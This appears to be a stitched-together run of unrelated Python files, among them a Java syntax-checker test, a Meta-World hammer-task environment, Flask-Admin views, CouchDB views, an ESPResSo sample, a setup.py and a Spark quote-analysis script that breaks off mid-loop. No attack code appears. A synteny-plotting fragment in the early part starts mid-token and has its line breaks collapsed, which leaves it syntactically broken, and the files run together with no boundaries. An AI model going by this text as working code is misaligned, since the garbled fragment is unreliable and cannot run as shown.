# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.

from check_eclipse_syntax import checkEclipseSyntax
from compile_error import CompileError
import unittest

# Deliberately broken Java source (missing '{' after main's signature and an
# unterminated string literal); the expected diagnostics below depend on the
# exact layout of this snippet.
ERROR_TEST = """public class HelloWorld {
	public static void main(String[] args) 
		// Prints "Hello, World" to the terminal window.
		System.out.println("Hello, World)
	}
}
"""


class TestStringMethods(unittest.TestCase):
    """Tests for checkEclipseSyntax, the Eclipse batch-compiler wrapper."""

    def test_syntax_ok(self):
        # Valid Java: the checker signals "no errors" by returning None.
        toTest = checkEclipseSyntax('public class Hello{ int a= 5;}')
        self.assertTrue(toTest is None)

    def test_syntax_error(self):
        # Broken Java: five diagnostics expected. toTest[0] appears to be
        # the diagnostic indices and toTest[1] their line numbers —
        # TODO confirm against checkEclipseSyntax's return contract.
        toTest = checkEclipseSyntax(ERROR_TEST)
        self.assertEqual(toTest[0], [1, 2, 3, 4, 5])
        self.assertEqual(toTest[1], [3, 5, 5, 5, 5])


if __name__ == '__main__':
    unittest.main()
pend((chr_name, chr_id, chr_len, cent_s, cent_e)) return r def build_ref_config_file(chr2acc_fname, agp_fnames): """ Build a configuration file of reference genome chromosomes from a chr2acc file and a series of AGP files that describe the assembled chromosomes. :param chr2acc_fname: a name of a chr2acc file :param agp_fnames: a list of reference chromosome AGP files :returns: a list of the configuration file """ acc2chr = {} with open(chr2acc_fname) as chr2acc_file: acc2chr = {x[1]: x[0] for x in map(lambda s: s.split('\t', 1), filter(lambda s: not s.startswith('#'), map(str.rstrip, chr2acc_file.readlines())))} chr_lengths = {} # values of the chr_centromeres dictionary are 2-tuples of start and # end positions of a centromere on a chromosome chr_centromeres = {} for k in agp_fnames: with gzip.open(k, "rt") as agp_file: lines = map(lambda x: (x[0], int(x[1]), int(x[2])) + tuple(x[3:]), map(lambda s: s.split('\t', 8), map(str.rstrip, filter(lambda s: not s.startswith('#'), agp_file.readlines())))) lines = sorted(lines, key=itemgetter(1)) chr_id = set(map(itemgetter(0), lines)) assert len(chr_id) == 1, \ "multiple chromosomes in an AGP file" chr_id = chr_id.pop() centromere = list(filter(lambda x: x[6] == "centromere", lines)) if centromere: assert len(centromere) == 1, "multiple centromeres" centromere = centromere[0] cent_start, cent_end = centromere[1], centromere[2] assert chr_id not in chr_centromeres or \ chr_centromeres[chr_id] == (cent_start, cent_end), \ "conflicting centromere records" chr_centromeres[chr_id] = (cent_start, cent_end) else: chr_centromeres[chr_id] = (None, None) chr_len = lines[-1][2] assert chr_id not in chr_lengths or \ chr_lengths[chr_id] == chr_len, \ "conflicting chromosome lengths" chr_lengths[chr_id] = chr_len return [(v, k, chr_lengths[k]) + chr_centromeres[k] for k, v in acc2chr.items()] def plot_frame(ref_chrom_config, p): """ Plot a frame of reference chromosomes for synteny blocks based on them. 
:param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function. :param p: a plotting parameter; its value should be between 10 and 100 :returns: a 2-tuple which first element is the plot frame Figure object and the secon
d element is the list of the AxesSubplot objects """ fig, axes = plt.subplots(ncols=1, nrows=len(ref_chrom_config)) max_len = reduce(max, map(itemgetter(2), ref_chrom_config)) shift = max_len / 30 for ax, chrom in zip(axes, ref_chrom_config): chr_name, _, chr_len, _, _ = chrom ax.set_xlim([-shift, max_len]) ax.set_ylim([-p, p])
ax.axis('off') ax.text(-shift, 0, chr_name, horizontalalignment="right", verticalalignment="center") ax.add_line(Line2D([0, chr_len], [0, 0], color="black", linewidth=0.5)) return fig, axes def add_centromeres(fig, ref_chrom_config, p, style): """ Add centromeres to a reference chromosome frame. :param fig: a Figure object of a reference chromosome frame :param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function :param p: a plotting parameter; its value should be between 10 and 100 :returns: the Figure object of the reference chromosome frame with added centromeres """ assert style in {"triangle", "butterfly"}, \ "incorrect centromere style" for ax, chrom in zip(fig.get_axes(), ref_chrom_config): _, _, _, cent_s, cent_e = chrom if cent_s is not None and cent_e is not None: ax.add_patch(Polygon(np.array( [[cent_s, p], [cent_e, p], [(cent_s + cent_e)/2, p/5]]), color="black")) if style == "butterfly": ax.add_patch(Polygon(np.array( [[cent_s, -p], [cent_e, -p], [(cent_s + cent_e)/2, -p/5]]), color="black")) return fig def extend_frame(axes, p): """ Extend a reference chromosome frame to add one more track of synteny blocks. :param axes: a list of the AxesSubplot objects returned by the plot_frame function :param p: a plotting parameter; its value should be between 150 and 300 :returns: the list of the AxesSubplot objects which correspond to the extended reference chromosome frame """ for ax in axes: y_min, y_max = ax.get_ylim() y_min -= 2*p ax.set_ylim((y_min, y_max)) return axes def add_synteny_block(ref_chrom_config, axes, chrom, start, end, strand, e_color, f_color, p): """ Add a synteny block to the reference chromosome frame. 
:param ref_chrom_config: a list of 5-tuples describing the reference chromosomes as returned by the load_ref_config function :param axes: a list of the AxesSubplot objects returned by the plot_frame function :param chrom: the chromosome a syntenic block is located on :param start: the start position of a syntenic block :param end: the end position of a syntenic block :param strand: the syntenic block orientation ('+', '-', or None) :param e_color: color of the block edge :param f_color: color the block is filled in :param p: a plotting parameter; its value should be between 150 and 300 :returns: the list of the AxesSubplot objects with the added synteny block """ global_x_max = reduce(max, map(lambda x: x.get_xlim()[1], axes)) alpha = global_x_max / 100 chr_dict = {v: k for k, v in enumerate(map(itemgetter(1), ref_chrom_config))} ax = axes[chr_dict[chrom]] _, x_max = ax.get_xlim() y_min, _ = ax.get_ylim() assert strand is None or strand in {'+', '-'}, "incorrect strand" l = end - start if l < global_x_max / 300: return axes if strand is None: r = Rectangle((start, y_min + p/4), height=3*p/2, width=end-start, edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) ax.add_patch(r) else: alpha = x_max/(2*p) if strand == '+': if l > alpha: p = Polygon(np.array([[start, y_min + 7*p/4], [end - alpha, y_min + 7*p/4], [end, y_min + p], [end - alpha, y_min + p/4], [start, y_min + p/4]]), edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) else: p = Polygon(np.array([[start, y_min + 7*p/4], [end, p], [start, y_min + p/4]]), edgecolor=e_color, facecolor=f_color, fill=True, linewidth=0.5) else: if l > alpha: p = Polygon(np.array([[end, y_min + 7*p/4], [start + alpha, y_min + 7*p/4], [start, y_min + p], [start + alpha, y_min + p/4], [end, y_min + p/4]]),
# This file is generated by /tmp/buildd/python-numpy-1.8.2/setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info", "show"]

# Build-time system_info results; empty dicts mean "not available".
blas_info = {'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
lapack_info = {'libraries': ['lapack'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
atlas_threads_info = {}
blas_opt_info = {'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
openblas_info = {}
atlas_blas_threads_info = {}
lapack_opt_info = {'libraries': ['lapack', 'blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
atlas_info = {}
lapack_mkl_info = {}
blas_mkl_info = {}
atlas_blas_info = {}
mkl_info = {}


def get_info(name):
    """Return the build-time system_info dict for *name*.

    Accepts either the bare name ('blas') or the full variable name
    ('blas_info'); returns an empty dict for unknown names.
    """
    g = globals()
    return g.get(name, g.get(name + "_info", {}))


def show():
    """Print every recorded system_info section to stdout.

    Empty sections are reported as NOT AVAILABLE. Long 'sources' values
    are elided to keep the output readable.
    """
    for name, info_dict in globals().items():
        # Skip dunder/internal names and anything that isn't an info dict.
        # (startswith/isinstance replace the original `name[0] == "_"` and
        # `type(info_dict) is not type({})` checks.)
        if name.startswith("_") or not isinstance(info_dict, dict):
            continue
        print(name + ":")
        if not info_dict:
            print("  NOT AVAILABLE")
        for k, v in info_dict.items():
            v = str(v)
            if k == "sources" and len(v) > 200:
                v = v[:60] + " ...\n... " + v[-60:]
            print("    %s = %s" % (k, v))
import numpy as np
from gym.spaces import Box

from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set


class SawyerHammerEnvV2(SawyerXYZEnv):
    """Sawyer task: grasp a hammer and drive a nail into a box.

    Success is determined by how far the nail's slide joint has been
    pushed in (see ``compute_reward``).
    """

    # Length of the hammer handle (metres, presumably -- TODO confirm against
    # the XML model). Used in `compute_reward` to widen the grasp target
    # along X to anywhere on the handle.
    HAMMER_HANDLE_LENGTH = 0.14

    def __init__(self):
        # Workspace bounds for the hand and for the randomized hammer start.
        hand_low = (-0.5, 0.40, 0.05)
        hand_high = (0.5, 1, 0.5)
        obj_low = (-0.1, 0.4, 0.0)
        obj_high = (0.1, 0.5, 0.0)
        # Goal space is effectively a point: the nail/box pose is fixed.
        goal_low = (0.2399, .7399, 0.109)
        goal_high = (0.2401, .7401, 0.111)

        super().__init__(
            self.model_name,
            hand_low=hand_low,
            hand_high=hand_high,
        )

        self.init_config = {
            'hammer_init_pos': np.array([0, 0.5, 0.0]),
            'hand_init_pos': np.array([0, 0.4, 0.2]),
        }
        self.goal = self.init_config['hammer_init_pos']
        self.hammer_init_pos = self.init_config['hammer_init_pos']
        self.obj_init_pos = self.hammer_init_pos.copy()
        self.hand_init_pos = self.init_config['hand_init_pos']
        # Filled in by `reset_model` from the 'nailHead' site.
        self.nail_init_pos = None

        self._random_reset_space = Box(np.array(obj_low), np.array(obj_high))
        self.goal_space = Box(np.array(goal_low), np.array(goal_high))

    @property
    def model_name(self):
        """Path to the MuJoCo XML describing this scene."""
        return full_v2_path_for('sawyer_xyz/sawyer_hammer.xml')

    @_assert_task_is_set
    def evaluate_state(self, obs, action):
        """Return the reward and an info dict for the given observation/action."""
        (
            reward,
            reward_grab,
            reward_ready,
            reward_success,
            success
        ) = self.compute_reward(action, obs)

        info = {
            'success': float(success),
            'near_object': reward_ready,
            'grasp_success': reward_grab >= 0.5,
            'grasp_reward': reward_grab,
            'in_place_reward': reward_success,
            'obj_to_target': 0,
            'unscaled_reward': reward,
        }

        return reward, info

    def _get_id_main_object(self):
        """Geom id of the hammer handle (the graspable part)."""
        return self.unwrapped.model.geom_name2id('HammerHandle')

    def _get_pos_objects(self):
        """Concatenated (hammer xyz, nail xyz) positions."""
        return np.hstack((
            self.get_body_com('hammer').copy(),
            self.get_body_com('nail_link').copy()
        ))

    def _get_quat_objects(self):
        """Concatenated (hammer quat, nail quat) orientations."""
        return np.hstack((
            self.sim.data.get_body_xquat('hammer'),
            self.sim.data.get_body_xquat('nail_link')
        ))

    def _set_hammer_xyz(self, pos):
        """Teleport the hammer to `pos` and zero its velocity.

        NOTE(review): qpos[9:12] / qvel[9:15] are assumed to be the hammer
        free joint's slice of the state vector -- confirm against the model.
        """
        qpos = self.data.qpos.flat.copy()
        qvel = self.data.qvel.flat.copy()
        qpos[9:12] = pos.copy()
        qvel[9:15] = 0
        self.set_state(qpos, qvel)

    def reset_model(self):
        """Reset the scene: fixed box/nail, (optionally) randomized hammer."""
        self._reset_hand()

        # Set position of box & nail (these are not randomized)
        self.sim.model.body_pos[self.model.body_name2id(
            'box'
        )] = np.array([0.24, 0.85, 0.0])
        # Update _target_pos
        self._target_pos = self._get_site_pos('goal')

        # Randomize hammer position
        self.hammer_init_pos = self._get_state_rand_vec() if self.random_init \
            else self.init_config['hammer_init_pos']
        self.nail_init_pos = self._get_site_pos('nailHead')
        self.obj_init_pos = self.hammer_init_pos.copy()
        self._set_hammer_xyz(self.hammer_init_pos)

        return self._get_obs()

    @staticmethod
    def _reward_quat(obs):
        """Reward in [0, 1] for keeping the hammer laid flat.

        An ideal laid-down hammer has quat [1, 0, 0, 0]. (The original
        comment said "wrench" -- apparently copied from another env.)
        Rather than deal with an angle between quaternions, just approximate
        with the norm of the quaternion difference.
        """
        ideal = np.array([1., 0., 0., 0.])
        error = np.linalg.norm(obs[7:11] - ideal)
        return max(1.0 - error / 0.4, 0.0)

    @staticmethod
    def _reward_pos(hammer_head, target_pos):
        """Reward in [0, 1] for bringing the hammer head to the nail."""
        pos_error = target_pos - hammer_head

        a = 0.1  # Relative importance of just *trying* to lift the hammer
        b = 0.9  # Relative importance of hitting the nail
        lifted = hammer_head[2] > 0.02
        in_place = a * float(lifted) + b * reward_utils.tolerance(
            np.linalg.norm(pos_error),
            bounds=(0, 0.02),
            margin=0.2,
            sigmoid='long_tail',
        )

        return in_place

    def compute_reward(self, actions, obs):
        """Return (reward, grab, quat, in_place, success) for this step.

        NOTE(review): obs[:3] is assumed to be the hand position and
        obs[4:7] the hammer position -- confirm against the base env's
        observation layout.
        """
        hand = obs[:3]
        hammer = obs[4:7]
        # Fixed offset from the hammer body origin to its head.
        hammer_head = hammer + np.array([.16, .06, .0])
        # `self._gripper_caging_reward` assumes that the target object can be
        # approximated as a sphere. This is not true for the hammer handle, so
        # to avoid re-writing the `self._gripper_caging_reward` we pass in a
        # modified hammer position.
        # This modified position's X value will perfect match the hand's X value
        # as long as it's within a certain threshold
        hammer_threshed = hammer.copy()
        threshold = SawyerHammerEnvV2.HAMMER_HANDLE_LENGTH / 2.0
        if abs(hammer[0] - hand[0]) < threshold:
            hammer_threshed[0] = hand[0]

        reward_quat = SawyerHammerEnvV2._reward_quat(obs)
        reward_grab = self._gripper_caging_reward(
            actions,
            hammer_threshed,
            object_reach_radius=0.01,
            obj_radius=0.015,
            pad_success_thresh=0.02,
            xz_thresh=0.01,
            high_density=True,
        )
        reward_in_place = SawyerHammerEnvV2._reward_pos(
            hammer_head,
            self._target_pos
        )

        reward = (2.0 * reward_grab + 6.0 * reward_in_place) * reward_quat
        # Override reward on success. We check that reward is above a threshold
        # because this env's success metric could be hacked easily
        success = self.data.get_joint_qpos('NailSlideJoint') > 0.09
        if success and reward > 5.:
            reward = 10.0

        return (
            reward,
            reward_grab,
            reward_quat,
            reward_in_place,
            success,
        )
# Constants shared by the Baidu Pan client: API endpoints, a randomly
# selected browser User-Agent, terminal colour templates, and the default
# download directory.
from random import randint
import os

# Baidu Pan (network disk) endpoints.
PAN_HOST = "pan.baidu.com"
PAN_INDEX = "http://%s" % PAN_HOST
DISK_HOME = "%s/disk/home" % PAN_INDEX
FILE_MANAGER = "%s/api/filemanager" % PAN_INDEX
CLOUD_DL = "%s/rest/2.0/services/cloud_dl" % PAN_INDEX

# Baidu passport (login) endpoints.
PASSPORT_HOST = 'passport.baidu.com'
PASSPORT_INDEX = "https://%s" % PASSPORT_HOST
PASSPORT_API = "%s/v2/api" % PASSPORT_INDEX

# Candidate browser User-Agent strings; one is picked at random per run.
USERAGENTLIST = [
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
]
USERAGENT = USERAGENTLIST[randint(0, len(USERAGENTLIST) - 1)]

# ANSI escape templates for coloured terminal output.
GREEN = u"\033[42m%s\033[m"
BLUE = u"\033[44m%s\033[m"
RED = u"\033[41m%s\033[0m"
WHITE = u"%s"

# Default directory that downloads are saved into.
SAVINGPATH = os.path.expanduser("~/Downloads")
# -*- coding: utf-8 -*-
"""Flask-Admin model views for articles and homepage slides."""
from __future__ import unicode_literals

from wtforms import validators
from jinja2 import Markup
# BUG FIX: the `flask.ext.*` namespace was deprecated and removed in
# Flask 1.0; the package must be imported directly.
from flask_admin.contrib.sqla import ModelView

from studio.core.engines import db
from suibe.models import SlideModel, ArticleModel

from .forms import CKTextAreaField


class Article(ModelView):
    """Admin CRUD view for `ArticleModel` with a CKEditor content field."""

    create_template = 'panel/article_edit.html'
    edit_template = 'panel/article_edit.html'

    column_labels = {'id': 'ID',
                     'title': '标题',
                     'is_sticky': '置顶',
                     'channel': '频道',
                     'date_published': '发布时间',
                     'date_created': '创建时间'}
    column_list = ['id', 'channel', 'is_sticky',
                   'title', 'date_published', 'date_created']
    column_searchable_list = ['title', ]
    # Newest published articles first.
    column_default_sort = ('date_published', True)

    form_extra_fields = {
        'content': CKTextAreaField('内容',
                                   validators=[validators.Required()]),
    }

    def __init__(self, **kwargs):
        super(Article, self).__init__(ArticleModel, db.session, **kwargs)

    def create_form(self, obj=None):
        """Hide the auto-populated creation timestamp on the create form."""
        form = super(Article, self).create_form()
        delattr(form, 'date_created')
        return form

    def edit_form(self, obj=None):
        """Hide the auto-populated creation timestamp on the edit form."""
        form = super(Article, self).edit_form(obj=obj)
        delattr(form, 'date_created')
        return form


class Slide(ModelView):
    """Admin CRUD view for `SlideModel` with an inline image preview."""

    column_labels = {'id': 'ID',
                     'order': '排序',
                     'title': '标题',
                     'describe': '描述',
                     'image': '图片链接',
                     'link': '链接',
                     'date_created': '创建时间'}
    column_list = ['id', 'order', 'title', 'describe',
                   'image', 'link', 'date_created']
    column_default_sort = ('order', True)

    form_args = {
        'image': {'label': '图片',
                  'validators': [validators.Required(),
                                 validators.URL()]},
        'link': {'label': '链接',
                 'validators': [validators.Required(),
                                validators.URL()]},
    }

    def _show_image(self, context, model, name):
        """Render the slide image as a thumbnail in the list view."""
        image = model.image.strip() if model.image else ''
        # SECURITY FIX: the URL is user-supplied; interpolating it into the
        # markup unquoted and unescaped allowed HTML/attribute injection.
        # `Markup.__mod__` HTML-escapes its operand.
        return Markup('<img src="%s" width="200" height="200" />') % image

    column_formatters = {
        'image': _show_image,
    }

    def __init__(self, **kwargs):
        super(Slide, self).__init__(SlideModel, db.session, **kwargs)

    def create_form(self, obj=None):
        """Hide the auto-populated creation timestamp on the create form."""
        form = super(Slide, self).create_form()
        delattr(form, 'date_created')
        return form

    def edit_form(self, obj=None):
        """Hide the auto-populated creation timestamp on the edit form."""
        form = super(Slide, self).edit_form(obj=obj)
        delattr(form, 'date_created')
        return form
# -*- coding: utf-8 -*-
"""View tests for the Mendeley citations addon.

Nearly all test cases come from the shared OAuth addon mixins; this module
only binds them to Mendeley-specific fixtures.
"""
import mock
import pytest
from future.moves.urllib.parse import urlparse, urljoin

from addons.base.tests import views
from addons.base.tests.utils import MockFolder

from addons.mendeley.models import Mendeley
from addons.mendeley.tests.utils import MendeleyTestCase, mock_responses
from tests.base import OsfTestCase

from addons.mendeley.provider import MendeleyCitationsProvider
from addons.mendeley.serializer import MendeleySerializer

# Base URL of the Mendeley REST API, used to build the mocked endpoints below.
API_URL = 'https://api.mendeley.com'

pytestmark = pytest.mark.django_db


class TestAuthViews(MendeleyTestCase, views.OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
    """OAuth authorization view tests -- all inherited from the mixin."""
    pass


class TestConfigViews(MendeleyTestCase, views.OAuthCitationAddonConfigViewsTestCaseMixin, OsfTestCase):
    """Addon config view tests, parameterized with Mendeley fixtures."""

    # Fixtures consumed by OAuthCitationAddonConfigViewsTestCaseMixin.
    folder = MockFolder()
    Serializer = MendeleySerializer
    client = Mendeley
    citationsProvider = MendeleyCitationsProvider
    foldersApiUrl = urljoin(API_URL, 'folders')
    documentsApiUrl = urljoin(API_URL, 'documents')
    mockResponses = mock_responses

    @mock.patch('addons.mendeley.models.NodeSettings._fetch_folder_name', mock.PropertyMock(return_value='Fake Name'))
    def test_deauthorize_node(self):
        # The folder-name fetch would hit the network; patch it out before
        # delegating to the shared deauthorization test.
        super(TestConfigViews, self).test_deauthorize_node()
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
Visualize the system cells and MPI domains. Run ESPResSo in parallel
to color particles by node. With OpenMPI, this can be achieved using
``mpiexec -n 4 ./pypresso ../samples/visualization_cellsystem.py``.
Set property ``system.cell_system.node_grid = [i, j, k]`` (with
``i * j * k`` equal to the number of MPI ranks) to change the way
the cellsystem is partitioned. Only the domain of MPI rank 0 will
be shown in wireframe.
"""

import espressomd
import espressomd.visualization_opengl
import numpy as np

# Abort early if the compiled feature set lacks what this script uses.
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)

box = [40, 30, 20]
system = espressomd.System(box_l=box)
visualizer = espressomd.visualization_opengl.openGLLive(
    system,
    window_size=[800, 800],
    background_color=[0, 0, 0],
    camera_position=[20, 15, 80],
    particle_coloring='node',   # color each particle by the MPI rank owning it
    draw_nodes=True,            # show MPI domain boundaries
    draw_cells=True)            # show the cell grid

system.time_step = 0.0005
system.cell_system.set_regular_decomposition(use_verlet_lists=True)
system.cell_system.skin = 0.4
#system.cell_system.node_grid = [i, j, k]

# Place 100 particles uniformly at random inside the box.
for i in range(100):
    system.part.add(pos=box * np.random.random(3))

system.non_bonded_inter[0, 0].lennard_jones.set_params(
    epsilon=100.0, sigma=1.0, cutoff=3.0, shift="auto")

# Relax overlaps from the random placement with steepest descent before
# switching back to the velocity-Verlet integrator.
energy = system.analysis.energy()
print(f"Before Minimization: E_total = {energy['total']:.2e}")
system.integrator.set_steepest_descent(f_max=50, gamma=30.0,
                                       max_displacement=0.001)
system.integrator.run(10000)
system.integrator.set_vv()
energy = system.analysis.energy()
print(f"After Minimization: E_total = {energy['total']:.2e}")

print("Tune skin")
system.cell_system.tune_skin(0.1, 4.0, 1e-1, 1000)
print(system.cell_system.get_state())

system.thermostat.set_langevin(kT=1, gamma=1, seed=42)

visualizer.run(1)
# -*- coding: utf-8 -*-
"""
################################################
Plataforma ActivUFRJ
################################################

:Author: *Núcleo de Computação Eletrônica (NCE/UFRJ)*
:Contact: carlo@nce.ufrj.br
:Date: $Date: 2009-2010 $
:Status: This is a "work in progress"
:Revision: $Revision: 0.01 $
:Home: `LABASE `__
:Copyright: ©2009, `GPL
"""

from couchdb.design import ViewDefinition
import core.database

################################################
#   CouchDB Permanent Views
################################################

# Counts activities grouped by (registry_id, group_id, status); the reduce
# function sums the emitted 1s.
# NOTE(review): the original Portuguese comments on every view here claimed
# "returns the list of questions used in a quiz" -- apparently copy-pasted
# from another module; they did not match what these views emit.
#
# Usage: database.ACTIVDB.view('activity/by_group',startkey=[registry_id],endkey=[id, {}, {}])
activity_by_group = ViewDefinition('activity', 'by_group', \
        '''
        function(doc) {
            if (doc.type=="activity") {
                emit([doc.registry_id, doc.group_id, doc.status], 1);
            }
        }
        ''', u'''
        function(keys, values) {
            return sum(values);
        }
        ''')

# Emits finalized ("finalizado") activities together with their groups; the
# trailing 0/1 in the key sorts each group row before its activity rows.
#
# Usage: database.ACTIVDB.view('activity/finalized_and_groups',startkey=[registry_id],endkey=[id, {}, {}])
activity_finalized_and_groups = ViewDefinition('activity', 'finalized_and_groups', \
        '''
        function(doc) {
            if (doc.type=="activity" && doc.status == "finalizado") {
                emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
            }
            if (doc.type=="group" ) {
                emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
            }
        }
        ''')

# Emits every activity (any status) together with the groups of a registry.
#
# Usage: database.ACTIVDB.view('activity/list_by_registry',startkey=[registry_id],endkey=[id, {}, {}])
activity_list_by_registry = ViewDefinition('activity', 'list_by_registry', \
        '''
        function (doc) {
            if (doc.type=="activity" ) {
                emit([doc.registry_id, doc.group_id, doc.data_cri,1], doc);
            }
            if (doc.type=="group") {
                emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
            }
        }
        ''')

# Emits NOT-finalized activities together with the groups of a registry.
#
# Usage: database.ACTIVDB.view('activity/Nfinalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_Nfinalized = ViewDefinition('activity', 'Nfinalized', \
        '''
        function(doc) {if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
                emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
            }
            if (doc.type=="group" ) {
                emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
            }
        }
        ''')

# Emits pending (not finalized) activities keyed by each assignee
# ("encarregado"); the same activity is emitted twice per assignee, once
# with the full doc (trailing 1) and once with only its group_id
# (trailing 0).
# NOTE(review): both branches below have identical conditions -- possibly
# intentional (two payloads per assignee), possibly a copy-paste slip.
activity_pendent = ViewDefinition('activity', 'pendent', \
        '''
        function(doc) {
            if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
                for (e in doc.encarregados){
                    emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 1], doc);
                }
            }
            if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
                for (e in doc.encarregados){
                    emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 0], doc.group_id);
                }
            }
        }
        ''',)

# Install (sync) all permanent views into the activity database.
ViewDefinition.sync_many(core.database.ACTIVDB, [
        activity_by_group, \
        activity_Nfinalized, \
        activity_pendent, \
        activity_finalized_and_groups, \
        activity_list_by_registry \
        ])
# encoding: utf-8
"""Packaging script for the `toasyncio` distribution."""
from setuptools import setup, find_packages

import toasyncio


def _read_long_description():
    """Read README.rst for PyPI.

    BUG FIX: the original `open('README.rst', 'r').read()` never closed the
    file handle; use a context manager.
    """
    with open('README.rst', 'r') as readme:
        return readme.read()


setup(
    name='toasyncio',
    packages=find_packages(exclude=['tests']),
    install_requires=(
        'tornado>=4.2',
        # NOTE(review): the PyPI 'asyncio' package is the old Python 3.3
        # backport; on Python 3.4+ (the only versions this package targets,
        # per the classifiers) the stdlib module is used instead. Kept to
        # preserve the published dependency set -- consider dropping it.
        'asyncio',
    ),
    author=toasyncio.__author__,
    version=toasyncio.__version__,
    author_email=", ".join("{email}".format(**a) for a in toasyncio.author_info),
    long_description=_read_long_description(),
    license='MIT',
    keywords=(
        "tornado",
        "asyncio",
    ),
    url='https://github.com/mosquito/toasyncio',
    description='Transparent convert any asyncio futures and inline yield methods to tornado futures.',
    zip_safe=False,
    classifiers=[
        'Environment :: Console',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
)
# Project : Dlab-Finance
# W251 Nital Patwa and Ritesh Soni
# Desc    : This program counts for each exchange, the #of times it produced best bid (or ask)
#           and average size of bid (or ask).
#           The purpose is to understand what roles exchanges such as BATS play.
# Usage Instructions
#    Change inputDir for daily quote file and outputDir for location of output
#    ./submit.sh 4 8G nbboex.py
#              ^#of nodes

'''
fields of dailyquotes file taqquote
[0:8]HHMMSSXXX [9] text EXCHANGE N Nyse T/Q NASDAQ
[10:25] text symbol 6+10
[26:36] bid price 7+4
[37:43] bid size (units)
[44:54] ask price 7+4
[55:61] ask size
[62] text Condition of quote
[63:66] market maker
[67] bid exchange
[68] ask aexchange
[69:84] int seqno
[85] int bbo indicator
[86] int NASDAQ BBO indocator
[87] text cancel/correction A=Normal B=Cancel C=Corrected-price
[88] text C=CTA N=UTP
[90] text Retail interest indicator
[...]
'''
import sys
from random import random
from operator import add

inputDir = "/global/scratch/npatwa/sparkinput/taqquote20100505"
outputDir = "/global/scratch/npatwa/sparkoutput/nbboexsize20100505/"


def processquote(record):
    """Count, per exchange, how often it showed the best bid/ask and the
    average size it quoted when it did.

    :param record: ``(symbol, quotes)`` where each quote is a tuple
        ``(index, time_ms, bid, bidsize, ask, asksize, bid_exch, ask_exch,
        cancel_flag)`` as built by the Spark driver below.
    :returns: ``[(symbol, (bbExCnt, bbExSize, baExCnt, baExSize))]`` with
        each list indexed by position in ``exchangeList``.
    """
    # Sort by index created using zipWithIndex to preserve ordering in tied
    # timestamps.
    listOrig = sorted(record[1])
    # Keep only regular trading hours (09:30:00.000 - 16:00:00.000).
    list1 = [rec for rec in listOrig
             if 93000000 <= int(rec[1]) <= 160000000]

    # Per-exchange order books for the NBBO calculation.
    exchangeList = ['A', 'B', 'C', 'D', 'I', 'J', 'K', 'M', 'N', 'T', 'P',
                    'S', 'Q', 'W', 'X', 'Y', 'Z']
    bidList = [0] * len(exchangeList)
    bidSize = [0] * len(exchangeList)
    askList = [sys.maxsize] * len(exchangeList)  # sys.maxsize == "no ask"
    askSize = [0] * len(exchangeList)
    nbboList = []
    bbExCnt = [0] * len(exchangeList)   # times each exchange had the best bid
    baExCnt = [0] * len(exchangeList)   # times each exchange had the best ask
    bbExSize = [0] * len(exchangeList)  # summed best-bid sizes (averaged below)
    baExSize = [0] * len(exchangeList)  # summed best-ask sizes (averaged below)
    currtime = 0

    # Iterate over the quotes; whenever the millisecond changes, snapshot
    # the NBBO of the millisecond that just ended.
    for i in range(len(list1)):
        if currtime != int(list1[i][1]):  # change of millisecond
            if (max(bidList) > 0) or (min(askList) < sys.maxsize):
                maxbid = max(bidList)
                minask = min(askList)
                bbEx = bidList.index(maxbid)  # exchange showing max bid
